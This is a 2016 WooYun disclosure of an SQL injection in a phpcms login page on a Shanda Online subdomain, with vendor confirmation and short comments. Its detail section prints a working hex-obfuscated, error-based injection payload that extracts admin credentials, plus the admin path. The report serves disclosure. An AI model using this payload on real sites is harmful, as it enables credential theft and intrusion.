当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(8) 关注此漏洞

缺陷编号: WooYun-2016-177317

漏洞标题: 盛大在线某二级域名分站存在SQL注射漏洞(第三方应用)

相关厂商: 盛大在线

漏洞作者: 骸骸

提交时间: 2016-02-20 18:38

公开时间: 2016-03-07 01:11

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 管理后台对外 Mysql 注射技巧

2人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-20: 细节已通知厂商并且等待厂商处理中
2016-02-20: 厂商已经确认,细节仅向厂商公开
2016-03-01: 细节向核心白帽子及相关领域专家公开
2016-03-11: 细节向普通白帽子公开
2016-03-21: 细节向实习白帽子公开
2016-03-07: 细节向公众公开

简要描述:

RT

详细说明:

http://video.sdo.com/ phpcms的

漏洞在http://video.sdo.com/index.php?m=member&c=index&a=login

账号密码随便填写,然后抓包



code 区域
123456&username=' union select '2999999','test','5f1d7a84db00d2fce00b31a7fc73224f','123456',null,0x272C2873656C656374202831292066726F6D206D7973716C2E7573657220776865726520313D3120614E64202853454C45435420312046524F4D202873656C65637420636F756E74282A292C636F6E63617428666C6F6F722872616E642830292A32292C28737562737472696E67282853656C656374202873656C65637420636F6E63617428757365726E616D652C307833612C70617373776F72642C307833612C656E6372797074292066726F6D2076395F61646D696E206C696D697420302C3129292C312C3632292929612066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C65732067726F75702062792061296229292C27,111,222,0x33333333272923,444,555,666,null#





将注入命令使用URL编码,最后得到

code 区域
123456%26username%3d%2527%2bunion%2bselect%2b%25272999999%2527%252c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252c0x272C2873656C656374202831292066726F6D206D7973716C2E7573657220776865726520313D3120614E64202853454C45435420312046524F4D202873656C65637420636F756E74282A292C636F6E63617428666C6F6F722872616E642830292A32292C28737562737472696E67282853656C656374202873656C65637420636F6E63617428757365726E616D652C307833612C70617373776F72642C307833612C656E6372797074292066726F6D2076395F61646D696E206C696D697420302C3129292C312C3632292929612066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C65732067726F75702062792061296229292C27%252c111%252c222%252c0x33333333272923%252c444%252c555%252c666%252cnull%2523





001.png





002.png





后台地址默认的:http://video.sdo.com/index.php?m=admin&c=index&a=login



点到为止。。。

漏洞证明:

002.png

修复方案:

过滤

版权声明:转载请注明来源 骸骸@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-02-20 23:14

厂商回复:

谢谢报告,这个网站我记得关了,咋又开了....!!!!

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2016-02-20 18:39 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
    1

    不科学啊,二次开发导致的?

  2. 2016-02-20 18:45 | 骸骸 ( 实习白帽子 | Rank:38 漏洞数:8 )
    1

    @疯狗 这是一个0day - -

  3. 2016-02-20 20:16 | 玉林嘎 认证白帽子 ( 普通白帽子 | Rank:933 漏洞数:107 )
    1

    PHPCMS么?

登录后才能发表评论,请先 登录